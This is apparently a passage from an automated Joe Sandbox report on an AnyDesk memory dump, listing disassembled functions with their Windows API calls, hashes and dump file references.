                                                                                                                                                                                                                                                  • Opcode ID: dc8688e25f6591bea681500c5bf1175f1984abc30a464b34f54fc7800f055a36
                                                                                                                                                                                                                                                  • Instruction ID: 2d931c5cab233094f4325a302aa18ac6df872e2f84f4bd594fdb945563f241af
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc8688e25f6591bea681500c5bf1175f1984abc30a464b34f54fc7800f055a36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3202A175A052199BDB24CF18ECA4B9DB3F4FF48714F5081AAD80AA7250F731AEA1CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B452 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 69C5B4EB
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 69C5B514
                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 69C5B529
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 122bed4342ed39829d84fc5a46293339f1a1e2c0515470751a287dc79d8fc072
                                                                                                                                                                                                                                                  • Instruction ID: c249e7e2f729cd054327107436694993d3923f29b1dfcebaae4778489ebc9244
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 122bed4342ed39829d84fc5a46293339f1a1e2c0515470751a287dc79d8fc072
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F521C172644104AAE724CF59FA02B97BBB6FB44B60B928464E90BD7100F732DD71C368
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B626 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 69C5B732
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 69C5B78D
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 69C5B79C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 69C5B7E4
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 69C5B803
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 745075371-0
                                                                                                                                                                                                                                                  • Opcode ID: 74b6b42912623ea28d7424d873e9c96f7d5fd02984fc0d890c54eb2a060778d8
                                                                                                                                                                                                                                                  • Instruction ID: a82e46e773448ce6d21576026af315d670ec20938f93eb6e1219b26de87d1558
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74b6b42912623ea28d7424d873e9c96f7d5fd02984fc0d890c54eb2a060778d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8519075A006099FEB10DFA5EC90ABABBB8BF45740F004069E925EB190F770D9308B75
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C229A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 132windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00000100,00000000,?,?), ref: 69C229D1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,00000100,00000000,?,?), ref: 69C22B45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • (0x%X), xrefs: 69C22A48
                                                                                                                                                                                                                                                  • Error (0x%X) while retrieving error. (0x%X), xrefs: 69C22B4C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                  • String ID: (0x%X)$Error (0x%X) while retrieving error. (0x%X)
                                                                                                                                                                                                                                                  • API String ID: 3479602957-3758316108
                                                                                                                                                                                                                                                  • Opcode ID: 4c39b5bca2a5accc1678782794fdc4799a2b93d997843081b71f7b579bc67b4f
                                                                                                                                                                                                                                                  • Instruction ID: fe63fa56c5b167db3d21fc25fda724da0228bd43be7652f0dcb3154576733310
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c39b5bca2a5accc1678782794fdc4799a2b93d997843081b71f7b579bc67b4f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5041C130A001289FDB29CB58DC54FEEB775EB49314F1042D9E45AAA2C1EB715F86CF91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C505C6 Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C505D6
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 69C505E8
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,69C7EC4C,000000FF,?,0000003F,?,?), ref: 69C50660
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,69C7ECA0,000000FF,?,0000003F,?,?,?,69C7EC4C,000000FF,?,0000003F,?,?), ref: 69C5068D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 806657224-0
                                                                                                                                                                                                                                                  • Opcode ID: f0d85f2c69815d5da7ef75d676183a760dff05bfb5e5812f370c06f0c846e73d
                                                                                                                                                                                                                                                  • Instruction ID: 6d910c48d456700e136c91b5dc3af6b36b371271791772a48d947ac40dad9aa1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0d85f2c69815d5da7ef75d676183a760dff05bfb5e5812f370c06f0c846e73d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31F576900255DFDB00CF69DC808BDBFB8FF86758714816AE865DB2A0EB308921CB15
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5B0D9 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B12D
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B17E
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B23E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2829624132-0
                                                                                                                                                                                                                                                  • Opcode ID: 72b7ee30e55b0d4b21814fdd4ecf7b15dcf130f3f57e2ffd117839f658b3c5c0
                                                                                                                                                                                                                                                  • Instruction ID: c93f684170a4c7d7ea7edb21416f44c5d2d5a796d48058a3457e069c88925934
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72b7ee30e55b0d4b21814fdd4ecf7b15dcf130f3f57e2ffd117839f658b3c5c0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD61C07154460B9FEB18CE25ED82B6A7BB8FF04304F1080BAE916D6581FB74D971CB68
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C45F8C Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 69C46084
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 69C4608E
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 69C4609B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  • Opcode ID: f2e3932f5065e33d9feccf4a1ff44b4e95c7b4b4d39d9a2d4b9b9a63ec115558
                                                                                                                                                                                                                                                  • Instruction ID: 317d8a360bac38b326609120cd98d839adaa2466cf5fdb82a1a71570f133a709
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2e3932f5065e33d9feccf4a1ff44b4e95c7b4b4d39d9a2d4b9b9a63ec115558
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9431D67594122CDBCB21DF64D988BDCBBB8BF08710F5081DAE81CA7250E7309B858F45
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3D200 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetUserDefaultUILanguage.KERNEL32 ref: 69C3D21F
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00000059,?,00000009), ref: 69C3D23D
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,0000005A,?,00000009,?,-00000001,?,00000059,?,00000009), ref: 69C3D284
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultLanguageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1606347679-0
                                                                                                                                                                                                                                                  • Opcode ID: 1b05186eb8ce0cf93f5860a016cce1b87efbd61bc1d2b2a2049cf6c552b6da0d
                                                                                                                                                                                                                                                  • Instruction ID: c74aefd53d3e291f76bdee862a54f79bf1fb5e0286024e131deadb5b4dfd0973
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b05186eb8ce0cf93f5860a016cce1b87efbd61bc1d2b2a2049cf6c552b6da0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1421A175A402289BDB10DEA6A845BAFB7B8EB45711F80016AF506D7281EB35DC06CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C5F711 Relevance: 4.5, APIs: 3, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 69C5F744
                                                                                                                                                                                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 69C5F759
                                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(?), ref: 69C5F769
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                                                                                                                  • Opcode ID: a67d438042493ee05df028a0b320557a8faa70141505e9b4febaae111ccb74a9
                                                                                                                                                                                                                                                  • Instruction ID: 31ecf8353c6468922639fd55c67c7db8ec5a236dacc482f391e39e0178a604ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a67d438042493ee05df028a0b320557a8faa70141505e9b4febaae111ccb74a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B012C7095021DAFDF00DFE0CD85ABEB7BCFB08201F404569A916E6180E7349A048A61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C62CE9 Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,?,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62CF2
                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,00000A2F,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62D00
                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,?,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62D12
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2853612939-0
                                                                                                                                                                                                                                                  • Opcode ID: d242ca1d5fd52857a0c9baced8091a62c50dde5c61b9eaed01bf37feb48d38b5
                                                                                                                                                                                                                                                  • Instruction ID: 4cc1eff97534192a909abda9397b7fbba18d424d380e4c96bf33b063c3aebfcc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d242ca1d5fd52857a0c9baced8091a62c50dde5c61b9eaed01bf37feb48d38b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F0C836901235ABDF311F65E95449A7BB9EF463517008826FD59D7034F631E852D7C0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C49E6A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000,?,69C45DF9,00000003,?,69C3FA3A,69C3FA7E), ref: 69C49E8B
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000,?,69C45DF9,00000003,?,69C3FA3A,69C3FA7E), ref: 69C49E92
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 69C49EA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: a2fe2388c1f6692f336c87e1cc416bf4f857a2acb361f3ae451cee51e5eb3a4d
                                                                                                                                                                                                                                                  • Instruction ID: a2b4eebf59393729abc3e8973b1019e920b8d98bd3e9e9bf27280a52c238138b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2fe2388c1f6692f336c87e1cc416bf4f857a2acb361f3ae451cee51e5eb3a4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FE046321006A8AFCF01AF61DA08AA93B79EB85B95B104424F8098A020DB35D843DB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4168B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 69C416A4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
